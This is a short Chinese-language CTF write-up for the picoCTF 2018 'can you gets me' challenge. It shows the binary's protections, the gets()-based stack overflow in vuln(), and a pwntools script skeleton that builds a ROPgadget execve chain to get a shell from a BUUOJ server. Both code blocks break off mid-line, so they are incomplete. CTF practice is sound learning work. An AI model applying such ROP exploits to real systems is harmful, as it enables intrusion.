picoctf_2018_can_you_gets_me

picoctf_2018_can_you_gets_me

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

32位，只开了NX

拿到这么大的程序，直接ROPchain看看

	#!/usr/bin/env python2
	# execve generated by ROPgadget

	from struct import pack

	# Padding goes here
	p = ''

	p += pack('

果不其然

然后去ida看看溢出点

int vuln()
{
  char v1[24]; // [esp+0h] [ebp-18h] BYREF

  puts("GIVE ME YOUR NAME!");
  return gets(v1);
}

秒了

思路

栈溢出直接ROPchain

from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",25457,"./pwn",10)
context(os='linux', arch='i386',log_level='debug')

def pwn():
    from struct import pack
    # Padding goes here
    p = cyclic(0x1c)+b''

    p += pack('

一个小技巧：用ROPchain，可以用def写好，这样复制过去就不用删空格了